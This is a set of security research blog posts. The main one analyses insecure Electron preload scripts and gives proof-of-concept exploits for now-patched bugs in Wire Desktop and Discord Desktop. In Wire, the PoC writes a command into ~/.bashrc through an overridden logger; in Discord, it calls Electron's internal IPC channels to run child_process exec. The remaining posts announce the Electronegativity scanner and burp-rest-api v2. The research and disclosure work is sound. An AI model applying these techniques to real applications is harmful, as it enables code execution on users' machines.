Despite popular belief, secure-by-default settings are slowly becoming the norm and the dev community is gradually learning common pitfalls. Isolation is now widely deployed across all top Electron applications and so turning XSS into RCE isn’t child’s play anymore.

BrowserWindow preload introduces a new and interesting attack vector. Even without a framework bug (e.g. nodeIntegration bypass), this neglected attack surface can be abused to bypass isolation and access Node.js primitives in a reliable manner.

You can download the slides of our talk from the official BlackHat Briefings archive: http://i.blackhat.com/asia-19/Thu-March-28/bh-asia-Carettoni-Preloading-Insecurity-In-Your-Electron.pdf

Preloading Insecurity In Your Electron

Preload is a mechanism to execute code before renderer scripts are loaded. This is generally employed by applications to export functions and objects to the page’s window object as shown in the official documentation:

let win
app.on('ready', () => {
  win = new BrowserWindow({
    webPreferences: {
      sandbox: true,
      preload: 'preload.js'
    }
  })
  win.loadURL('http://google.com')
})

preload.js can contain custom logic to augment the renderer with easy-to-use functions or application-specific objects:

const fs = require('fs')
const { ipcRenderer } = require('electron')

// read a configuration file using the `fs` module
const buf = fs.readFileSync('allowed-popup-urls.json')
const allowedUrls = JSON.parse(buf.toString('utf8'))

const defaultWindowOpen = window.open

function customWindowOpen (url, ...args) {
  if (allowedUrls.indexOf(url) === -1) {
    ipcRenderer.sendSync('blocked-popup-notification', location.origin, url)
    return null
  }
  return defaultWindowOpen(url, ...args)
}

window.open = customWindowOpen

[...]

Through performing numerous assessments on behalf of our clients, we noticed a general lack of awareness around the risks introduced by preload scripts. Even in popular applications using all recommended security best practices, we were able to turn boring XSS into RCE in a matter of hours.

This prompted us to further research the topic and categorize four types of insecure preloads:

(1) Preload scripts can reintroduce Node global symbols back to the global scope

While it is evident that reintroducing some Node global symbols (e.g. process) to the renderer is dangerous, the risk is not immediately obvious for classes like Buffer (which can be leveraged for a nodeIntegration bypass)
(2) Preload scripts can introduce functionalities that can be abused by untrusted code

Preload scripts have access to Node.js, and the functions exported by applications to the global window often include dangerous primitives
(3) Preload scripts can facilitate sandbox bypasses

Even with sandbox enabled, preload scripts still have access to Node.js native classes and a few Electron modules. Once again, preload code can leak privileged APIs to untrusted code that could facilitate sandbox bypasses
(4) Without contextIsolation, the integrity of preload scripts is not guaranteed

When isolated worlds are not in use, prototype pollution attacks can override preload script code. Malicious JavaScript running in the renderer can alter preload functions in order to return different data, bypass checks, etc.
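
Group (4) can be illustrated without Electron at all. The sketch below runs in plain Node.js and simulates a preload script and untrusted page code sharing a single JavaScript world, which is the situation when contextIsolation is disabled. guardedOpen is a hypothetical stand-in modeled on the customWindowOpen example above, and the URLs are placeholders.

```javascript
// "Preload" side: a URL allowlist check, modeled on customWindowOpen above.
const allowedUrls = ['https://app.example.com/help'];

function guardedOpen(url) {
  if (allowedUrls.indexOf(url) === -1) {
    return 'blocked';
  }
  return 'opened ' + url;
}

// Before any tampering, the check behaves as intended.
const resultBefore = guardedOpen('https://evil.example.net/');

// "Page" side: untrusted code in the same world overrides a built-in that
// the preload check relies on, so every lookup now appears to succeed.
const originalIndexOf = Array.prototype.indexOf;
Array.prototype.indexOf = function () { return 0; };

const resultAfter = guardedOpen('https://evil.example.net/');

// Restore the built-in so the rest of the process is unaffected.
Array.prototype.indexOf = originalIndexOf;

console.log(resultBefore); // blocked
console.log(resultAfter);  // opened https://evil.example.net/
```

The preload code itself is never modified; only the shared prototype it depends on is. With isolated worlds, the page and the preload script each get their own copy of the built-ins, so this override would not reach the preload check.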

In this blog post, we will analyze a couple of vulnerabilities belonging to group (2) which we discovered in two popular applications: Wire App and Discord.

For more vulnerabilities and examples, please refer to our presentation.

WireApp Desktop Arbitrary File Write via Insecure Preload

Wire App is a self-proclaimed “most secure collaboration platform”. It’s a secure messaging app using end-to-end encryption for file sharing, voice, and video calls. The application implements isolation by using a BrowserWindow with nodeIntegration disabled, in which a webview HTML tag is used.

Despite enforcing isolation, the web-view-preload.js preload file contains the following code:

const webViewLogger = new winston.Logger();
    webViewLogger.add(winston.transports.File, {
      filename: logFilePath,
      handleExceptions: true,
    });

    webViewLogger.info(config.NAME, 'Version', config.VERSION);

    // webapp uses global winston reference to define log level
    global.winston = webViewLogger;

Code running in the isolated renderer (e.g. XSS) can override the logger’s transport setting in order to obtain a file write primitive.

This issue can be easily verified by switching to the messages view:

window.document.getElementsByTagName("webview")[0].openDevTools();

Before executing the following code:

function formatme(args) {
  var logMessage = args.message;
  return logMessage;
}

winston.transports.file = (new winston.transports.file.__proto__.constructor({
        dirname: '/home/ikki/',
        level: 'error',
        filename: '.bashrc',
        json: false,
        formatter: formatme
}))

winston.error('xcalc &');

This issue affected all supported platforms (Windows, Mac, Linux). As the sandbox entitlement is enabled on macOS, an attacker would need to chain this issue with another bug to write outside the application folders. Please note that since it is possible to override some application files, RCE may still be possible without a macOS sandbox bypass.

A security patch was released on March 14, 2019, just a few days after our disclosure.

Discord Desktop Arbitrary IPC via Insecure Preload

Discord is a popular voice and text chat used by over 250 million gamers. The application implements isolation by simply using a BrowserWindow with nodeIntegration disabled. Despite that, the preload script (app/mainScreenPreload.js) in use by the same BrowserWindow contains multiple exports including the following:

var DiscordNative = {
    isRenderer: process.type === 'renderer',
    //..
    ipc: require('./discord_native/ipc'),
};

//..

process.once('loaded', function () {
    global.DiscordNative = DiscordNative;
    //..
});

where app/discord_native/ipc.js contains the following code:

var electron = require('electron');
var ipcRenderer = electron.ipcRenderer;

function send(event) {
  for (var _len = arguments.length, args = Array(_len > 1 ? _len - 1 : 0), _key = 1; _key < _len; _key++) {
    args[_key - 1] = arguments[_key];
  }

  ipcRenderer.send.apply(ipcRenderer, [event].concat(args));
}

function on(event, callback) {
  ipcRenderer.on(event, callback);
}

module.exports = {
  send: send,
  on: on
};

Without going into details, this script is basically a wrapper for Electron’s official asynchronous IPC mechanism, used to exchange messages between the renderer process (web page) and the main process.

In Electron, ipcMain and ipcRenderer modules are used to implement IPC between the main process and the renderers but they’re also leveraged for internal native framework invocations. For instance, the window.close() function is implemented using the following event listener:

// Implements window.close()
ipcMainInternal.on('ELECTRON_BROWSER_WINDOW_CLOSE', function (event) {
  const window = event.sender.getOwnerBrowserWindow()
  if (window) {
    window.close()
  }
  event.returnValue = null
})

As there’s no separation between application-level IPC messages and the ELECTRON_ internal channel, the ability to set arbitrary channel names allows untrusted code in the renderer to subvert the framework’s security mechanism.

For example, the following synchronous IPC calls can be used to execute an arbitrary binary:

(function () {
    var ipcRenderer = require('electron').ipcRenderer
    var electron = ipcRenderer.sendSync("ELECTRON_BROWSER_REQUIRE","electron");
    var shell = ipcRenderer.sendSync("ELECTRON_BROWSER_MEMBER_GET", electron.id, "shell");
    return ipcRenderer.sendSync("ELECTRON_BROWSER_MEMBER_CALL", shell.id, "openExternal", [{
                            type: 'value',
                            value: "file:///Applications/Calculator.app"
    }]);
})();

In the case of Discord’s preload, an attacker can issue asynchronous IPC messages with arbitrary channels. While it is not possible to obtain a reference to the objects from the function exposed in the untrusted window, an attacker can still brute-force the reference of the child_process module using the following code:

DiscordNative.ipc.send("ELECTRON_BROWSER_REQUIRE","child_process");

for(var i=0;i<50;i++){
    DiscordNative.ipc.send("ELECTRON_BROWSER_MEMBER_CALL", i, "exec", [{
            type: 'value',
            value: "calc.exe"
    }]);
}

This issue affected all supported platforms (Windows, Mac, Linux). A security patch was released at the beginning of 2019. Additionally, Discord also removed backwards compatibility code with old clients.
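
One way to narrow this kind of exposure is to have the preload wrapper accept only application-defined channels. The following is a minimal sketch of that idea and not Discord’s actual patch: createRestrictedIpc and the channel names are hypothetical, and ipcRenderer is passed in as a parameter so that the snippet also runs outside Electron.

```javascript
// Hypothetical allowlist of application-level channels.
const APP_CHANNELS = new Set(['APP_OPEN_SETTINGS', 'APP_UPDATE_READY']);

// Wraps an ipcRenderer-like object and rejects any channel that is not
// explicitly allowlisted, which also excludes the ELECTRON_ internal ones.
function createRestrictedIpc(ipcRenderer, allowedChannels = APP_CHANNELS) {
  function assertAllowed(channel) {
    if (typeof channel !== 'string' || !allowedChannels.has(channel)) {
      throw new Error('IPC channel not allowed: ' + String(channel));
    }
  }
  return Object.freeze({
    send(channel, ...args) {
      assertAllowed(channel);
      ipcRenderer.send(channel, ...args);
    },
    on(channel, callback) {
      assertAllowed(channel);
      ipcRenderer.on(channel, callback);
    },
  });
}
```

In a preload script, the exported object would be created with createRestrictedIpc(require('electron').ipcRenderer). As noted for group (4) above, such a check is only as trustworthy as the JavaScript world it runs in, so it complements context isolation and does not replace it.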

Electronegativity is finally out!

2019-01-24T00:00:00+01:00

We’re excited to announce the public release of Electronegativity, an open-source tool capable of identifying misconfigurations and security anti-patterns in Electron-based applications.

Electronegativity is the first-of-its-kind tool that can help software developers and security auditors to detect and mitigate potential weaknesses in Electron applications.

If you’re simply interested in trying out Electronegativity, go ahead and install it using NPM:

$ npm install @doyensec/electronegativity -g

To review your application, use the following command:

$ electronegativity -i /path/to/electron/app

Results are displayed in a compact table, with references to application files and our knowledge-base.

The remainder of this blog post provides more details on the public release and introduces the tool's current features.

A bit of history

Back in July 2017 at the BlackHat USA Briefings, we presented the first comprehensive study on Electron security where we primarily focused on framework-level vulnerabilities and misconfigurations. As part of our research journey, we also created a checklist of security anti-patterns and must-have features to illustrate misconfigurations and vulnerabilities in Electron-based applications.

With that, Claudio Merloni and I started developing the first prototype for Electronegativity. Immediately after the BlackHat presentation, we received a lot of great feedback and new ideas on how to evolve the tool. Back home, we started working on those improvements until we realized that we had to rethink the overall design. The code repository was made private again, and minor refinements were made only in between customer projects.

In the summer of 2018, we hired Doyensec’s first intern, Ibram Marzouk, who started working on the tool again. Later, Jaroslav Lobacevski joined the project team and pushed Electronegativity to the finish line. Claudio, Ibram and Jaroslav, thanks for your contributions!

While certainly overdue, we’re happy that we eventually managed to release the tool in better shape. We believe that Electron is here to stay and hopefully Electronegativity will become a useful companion for all Electron developers out there.

How Does It Work?

Electronegativity leverages AST / DOM parsing to look for security-relevant configurations. Checks are standalone files, which makes the tool modular and extensible.

Building a new check is relatively easy too. We support three “families” of checks, so that the tool can analyze all resources within an Electron application:

JS (using a combination of Esprima, Babel, TypeScript ESTree)
HTML (using Cheerio)
JSON (using the native JSON.parse())

When you scan an application, the tool will unpack all resources (if applicable) and perform an audit using all registered checks. Results can be displayed in the terminal or exported as a CSV file or in SARIF format.
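To make the idea of standalone, per-family checks more concrete, here is a minimal sketch of a JSON-family check and a tiny runner. This is not Electronegativity's actual check interface: the object shape (id, family, match), the audit function and the sample config.json content are all assumptions made for illustration.

```javascript
// Hypothetical check: flags option objects stored in JSON that enable
// nodeIntegration. The check id and result shape are illustrative only.
const nodeIntegrationJsonCheck = {
  id: "EXAMPLE_NODE_INTEGRATION_JSON",
  family: "JSON",
  match(data) {
    const findings = [];
    // Recursively walk the parsed JSON, tracking the key path to each node.
    (function walk(node, path) {
      if (node === null || typeof node !== "object") return;
      for (const [key, value] of Object.entries(node)) {
        const here = path.concat(key);
        if (key === "nodeIntegration" && value === true) {
          findings.push({ path: here.join(".") });
        }
        walk(value, here);
      }
    })(data, []);
    return findings;
  },
};

// Minimal runner: parse each resource with the native JSON.parse(),
// then apply every registered check that belongs to the JSON family.
function audit(files, checks) {
  const results = [];
  const jsonChecks = checks.filter((c) => c.family === "JSON");
  for (const { name, content } of files) {
    let data;
    try {
      data = JSON.parse(content);
    } catch (e) {
      continue; // skip resources that are not valid JSON
    }
    for (const check of jsonChecks) {
      for (const finding of check.match(data)) {
        results.push({ check: check.id, file: name, path: finding.path });
      }
    }
  }
  return results;
}

// Hypothetical input resource.
const results = audit(
  [{ name: "config.json", content: '{"window":{"webPreferences":{"nodeIntegration":true}}}' }],
  [nodeIntegrationJsonCheck]
);
console.log(results);
```

Keeping each check as a self-contained object with its own match function is what lets a runner like this stay generic: adding a new check means registering one more object, without touching the parsing or reporting code.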

Supported Checks

Electronegativity currently implements the following checks. A knowledge-base containing information around risk and auditing strategy has been created for each class of vulnerabilities:

Leveraging these 27 checks, Electronegativity is already capable of identifying many vulnerabilities in real-life applications. Going forward, we will keep improving the detection and updating the tool to keep pace with the fast-changing Electron framework. Start using Electronegativity today!

Introducing burp-rest-api v2

2018-11-05T00:00:00+01:00

Since the first commit back in 2016, burp-rest-api has been the default tool for BurpSuite-powered web scanning automation. Many security professionals and organizations have relied on this extension to orchestrate the work of Burp Spider and Scanner.

Today, we’re proud to announce a new major release of the tool: burp-rest-api v2.0.1

Starting in June 2018, Doyensec joined VMware in the development and support of the growing burp-rest-api community. After several years of experience in big tech companies and startups, we understand the need for security automation to improve efficacy and efficiency during software security activities. Unfortunately, internal security tools are rarely open-sourced, and too many companies are still reinventing the wheel. We believe that working together on foundational components, such as burp-rest-api, represents the future of security automation as it empowers companies of any size to build customized solutions.

After a few weeks of work, we cleaned up all the open issues and brought burp-rest-api to its next phase. In this blog post, we would like to summarize some of the improvements.

Releases

You can now download the latest version of burp-rest-api from https://github.com/vmware/burp-rest-api/releases in a precompiled release build. While this may not sound like a big deal, it’s actually the result of a major change in the plugin bootstrap mechanism. Until now, burp-rest-api was strictly dependent on the original Burp Suite JAR to be compiled, hence we weren’t able to create stable releases due to licensing. By re-engineering the way burp-rest-api starts, it is now possible to build the extension without even having burpsuite_pro.jar.

git clone git@github.com:vmware/burp-rest-api.git
cd burp-rest-api
./gradlew clean build

Once the build completes, you can run Burp with the burp-rest-api extension using the following command:

java -jar burp-rest-api-2.0.0.jar --burp.jar=./lib/burpsuite_pro.jar

Burp Extensions and BAppStore

Many users have asked for the ability to load additional extensions while running Burp with burp-rest-api. Thanks to a new bootstrap mechanism, burp-rest-api is loaded as a 2nd generation extension which makes it possible to load both custom and BAppStore extensions written in any of the supported programming languages.

Moreover, the tool allows loading extensions during application startup using the flag --burp.ext=<filename.{jar,rb,py}>.

In order to implement this, we employed a classloading technique with a dummy entry point (BurpExtender.java) that loads the legacy Burp extension (LegacyBurpExtension.java) after the full Burp Suite has been loaded and launched (BurpService.java).

Bug Fixes and Improvements

In this release, we have also focused our efforts on a massive house-cleaning of open issues:

Better documentation, including an FAQ page
Burp Spider status API
Burp Configuration with configPath selection API
Enabled SpringBoot compression
Ability to customize the binding address:port for both Burp Proxy and burp-rest-api APIs via command line arguments
…and much more

Help Us Shape The Future of burp-rest-api

With the release of Burp Suite Professional 2.0 (beta), Burp now includes a native REST API.

While its current functionality is very limited, this is certainly going to change.

In the initial release, the REST API supports launching vulnerability scans and obtaining the results. Over time, additional functions will be added to the REST API.

It’s great that Burp users will finally benefit from a native REST API. However, this new feature makes us wonder about the future of this project.

Let us know how burp-rest-api can still provide value, and which directions the project could take. Comment on this GitHub issue or tweet to our @Doyensec account.

Thank you for the support,

Luca Carettoni & Andrea Brancaleoni
